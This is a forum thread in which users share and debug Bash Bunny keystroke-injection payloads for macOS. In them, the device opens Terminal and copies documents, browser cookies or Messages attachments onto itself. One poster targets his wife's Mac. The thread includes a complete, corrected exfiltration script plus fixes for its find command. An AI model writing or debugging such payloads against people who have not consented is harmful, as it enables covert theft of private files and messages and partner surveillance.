WiFiJuice Posted September 3, 2017: Guys, which Bash Bunny payloads have you had any success with on OS X?
Firestorm Posted September 3, 2017: No. What is your problem with your Bash Bunny?
Opticon Posted September 5, 2017: @WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. The one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload, and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)
couchTornado Posted September 7, 2017: Granted, this was my first attempt at running a payload from the BB on Mac OSX, but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. nmap has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago). Working at an art school, we run MacOS everywhere (80-90% of our machines across academic and administrative units). I'll keep poking at it, but if anyone has an easy fix, I'm all ears.
WiFiJuice (Author) Posted September 7, 2017: Awesome work with the Macinfograbber :) Thanks @Opticon. Hope we will have more Mac OS X payloads working on the BB soon. It has a huge percentage of the operating system market share: http://gs.statcounter.com/os-market-share/all/united-states-of-america
Opticon Posted September 7, 2017: Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and, don't you know, it works on them all! However, @couchTornado has a valid point regarding nmap and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if nmap can't be used, what if we just call upon something inherent to Terminal? Such as:

Scan the available wireless networks:
    /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

Set up a network listener on port 2196 for testing:
    /usr/bin/nc -l 2196

Capture some packets:
    tcpdump -nS

Capture all the packets:
    tcpdump -nnvvXS

Capture the packets for a given port:
    tcpdump -nnvvXS port 548    # "-s 548" would set the snap length, not filter on a port

These are just a couple of things to consider while I toil away with a proper OSX nmap hack. Cheers!
WiFiJuice (Author) Posted September 7, 2017: @Opticon do you mind sharing your payload? Mine didn't work... I have a Swedish keyboard, so I used "QUACK SET_LANGUAGE se" at the top, but it didn't do the trick...
Opticon Posted September 7, 2017: @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github, etc.? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!
WiFiJuice (Author) Posted September 7, 2017: 3 hours ago, Opticon said: "@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github, etc.? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!" @Opticon just sent you a DM :)
Opticon Posted September 7, 2017: @WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers!
Opticon Posted September 7, 2017: For reasons unknown to me, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture needed to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist; however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)
Opticon Posted September 8, 2017: Well @WiFiJuice I'll get working on it. However, here's a pertinent question: what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3: restores and switches that won't execute payloads, etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al. to answer. Cheers
Dave-ee Jones Posted September 8, 2017: Please don't tag everyone like that; if they deem it important enough, they will give their answer (Sebkinne answers if no one else has, or if he wants to add to something or confirm something, but Darren rarely does). Not to mention you left me out... :( I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, and therefore not very well with 1.2. Not sure why you would be getting weird switch errors.
WiFiJuice (Author) Posted September 8, 2017: How can I make something like this without PowerShell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

    QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
PoSHMagiC0de Posted September 8, 2017: 2 hours ago, WiFiJuice said: "How can I make something like this without PowerShell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows: QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"" Use python. I do not have the code off the top of my head right now, but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross-platform, with the OSX and Linux agent parts being done in python. The issue with the above is that I know on Linux you need to be root or use sudo to mount a removable drive. That is the reason I chose the network approach for the BBTPS, so I do not have to worry about mounting anything on the victim.
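The macOS/Linux counterpart of the PowerShell one-liner asked about above, as an added example that is not code from this thread or from the BBTPS (PoSHMagiC0de suggests python; this version is plain /bin/sh so it runs wherever the target has a shell). It assumes the Bash Bunny's storage partition is mounted by its volume label, BashBunny, at /Volumes/BashBunny on a Mac and under /media/<user> or /run/media/<user> on Linux desktops, and that the commands to run sit in a file named commands.txt under payloads/<switch>/ (the file name and the stage.sh name in the comment are assumptions for illustration).

```shell
#!/bin/sh
# Added example, not code from the thread: locate the Bash Bunny's storage
# partition by its volume label and run a command file from it line by line,
# the way the PowerShell one-liner dot-sources 1.ps1 on Windows.
# Mount-point bases and the commands.txt file name are assumptions.

# find_bunny_volume BASE... : print the mount point of the BashBunny volume
# found under one of the BASE directories (directly, as on macOS, or one level
# down, as the Linux automounters do) and return 0; return 1 if not mounted.
find_bunny_volume() {
    for base in "$@"; do
        for d in "$base"/BashBunny "$base"/*/BashBunny; do
            if [ -d "$d" ]; then
                printf '%s\n' "$d"
                return 0
            fi
        done
    done
    return 1
}

# run_commands_file FILE : execute every non-blank, non-comment line of FILE
# with /bin/sh, stop at the first failing line, and print how many lines ran.
run_commands_file() {
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;
        esac
        sh -c "$line" || return 1
        n=$((n + 1))
    done < "$1"
    printf '%s\n' "$n"
}

# stage SWITCH : the entry point payload.txt would have the target run, e.g.
#   QUACK STRING sh /Volumes/BashBunny/payloads/$SWITCH_POSITION/stage.sh $SWITCH_POSITION
# ($SWITCH_POSITION is expanded on the Bunny before the line is typed, so the
# target-side script receives the switch name as its argument).
stage() {
    vol=$(find_bunny_volume /Volumes /media /run/media) || return 1
    run_commands_file "$vol/payloads/$1/commands.txt"
}
```

Because the Bunny's own bash expands `$SWITCH_POSITION` before QUACK types the line, the target never needs to know which switch is set; it only needs the volume to be mounted, which the Mac does automatically and most Linux desktops do for the logged-in user.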
WiFiJuice (Author) Posted September 8, 2017: The Swedish language file is wrong, @Sebkinne; for example, it can't write out a "~" correctly and messes up my code... How can this be fixed?
Opticon Posted September 8, 2017: @WiFiJuice You bring up an excellent point, one that I wish the developers had anticipated. Hopefully, as you've addressed this problem before, they will look into resolving the language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.
RazerBlade Posted September 8, 2017: 2 hours ago, WiFiJuice said: "The Swedish language file is wrong, @Sebkinne; for example, it can't write out a "~" correctly and messes up my code... How can this be fixed?" I'm also using the Swedish keyboard layout. In my experience the language file works great on Windows, but as you said, it spells out the character wrong.
RazerBlade Posted September 8, 2017: It appears that to type ~ on a Mac with the Swedish Pro layout, which most Swedish users use, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed.
WiFiJuice (Author) Posted September 8, 2017: 5 minutes ago, RazerBlade said: "It appears that to type ~ on a Mac with the Swedish Pro layout, which most Swedish users use, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed." Yes, that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"
WiFiJuice (Author) Posted September 10, 2017: This is the layout of the Swedish Pro keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important tilde sign " ~ ", nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.
quentin_lamamy Posted September 13, 2017: I am currently working on an OSX-specific keyboard layout. For the moment, to resolve the keyboard issue on OSX, switch to the PC layout in the keyboard settings.
ImInAjar Posted January 4, 2019: @Opticon do you have a git repository with some of your modifications? I'm working on modifying InfoGrabber to retrieve pictures sent via text from my wife's Mac before she has to return it to work, but I can't get the following to work:

    QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

The script dies at this line with the output:

    find: -exec: no terminating ";" or "+"

I can't find any documentation on what may be happening. Any help would be great.
ImInAjar Posted January 4, 2019: 1 minute ago, ImInAjar said: "@Opticon do you have a git repository with some of your modifications? I'm working on modifying InfoGrabber to retrieve pictures sent via text from my wife's Mac before she has to return it to work, but I can't get the following to work: QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; The script dies at this line with the output find: -exec: no terminating ";" or "+". I can't find any documentation on what may be happening. Any help would be great."

Full script (reformatted from the post; the find line, the loot check and the eject step are corrected, see the comments):

#!/bin/bash
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images
QUACK ENTER
QUACK DELAY 500
# Fixed: payload.txt is run by bash on the Bunny, so an unquoted \; reached QUACK as a bare ";"
# and the Mac's shell ended the command there, before find ever saw its -exec terminator.
# Quoting the whole string keeps \( \) and \; intact. The parentheses are needed too:
# "-iname a -o -iname b -type f -exec ..." applies the -exec only to the -o's right-hand side.
QUACK STRING "find ~/Library/Messages/Attachments/ -type f \( -iname '*.jpeg' -o -iname '*.jpg' -o -iname '*.png' \) -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;"
QUACK ENTER
# Give the copy time to finish before looking at the loot
sleep 15

# Sync filesystem
sync

# Green LED for finished
LED G

# Fixed: on the Bunny the storage partition is /root/udisk, not /Volumes/BashBunny
files=$(ls /root/udisk/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)
if [ "$files" != "0" ]; then
    LED R B    # Got image files
else
    LED R      # No image files
fi

# Eject BB. Fixed: each command has to be typed and entered on the Mac; a bare ";" on a
# QUACK line would run killall on the Bunny itself. The macOS process name is Terminal.
QUACK STRING diskutil unmount BashBunny
QUACK ENTER
QUACK DELAY 2000
QUACK STRING killall Terminal
QUACK ENTER
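Why the find line in the post above produces `find: -exec: no terminating ";" or "+"`, shown as an added example that is not the poster's script: the Bunny runs payload.txt with bash, so bash removes the quotes and the backslash from an unquoted QUACK STRING line before QUACK types it, and the Mac's shell then reads the bare `;` as a command separator. The block below mimics that word-joining and also shows the `-o` precedence trap in the same find expression, using a constructed directory tree rather than anything from a real Messages folder; the function names are assumptions.

```shell
#!/bin/sh
# Added example, not the poster's script: reproduce what bash hands to QUACK,
# and run the corrected find over a constructed tree of sample files.

# typed_text WORD... : what QUACK STRING receives after bash's own parsing of
# payload.txt, i.e. the words joined by single spaces with quotes and
# backslashes already stripped. Called with an unquoted \; it yields a bare ";".
typed_text() {
    printf '%s' "$*"
}

# copy_attachments SRC DST : copy every regular *.jpeg/*.jpg/*.png file below
# SRC into DST (flat) and print how many files DST then holds.
# The \( ... \) group is essential: "-iname a -o -iname b -type f -exec ..."
# parses as "a OR (b AND f AND exec)", so without it the .jpeg matches
# satisfy the left branch and are silently skipped by the -exec.
copy_attachments() {
    mkdir -p "$2"
    find "$1" -type f \( -iname '*.jpeg' -o -iname '*.jpg' -o -iname '*.png' \) \
        -exec cp {} "$2"/ \;
    find "$2" -type f | wc -l | tr -d ' '
}
```

In a payload the same protection comes from wrapping the whole command in double quotes on the QUACK STRING line, which bash leaves untouched apart from expanding `$lootdir`; the `\(`, `\)` and `\;` then reach the Mac exactly as find expects them.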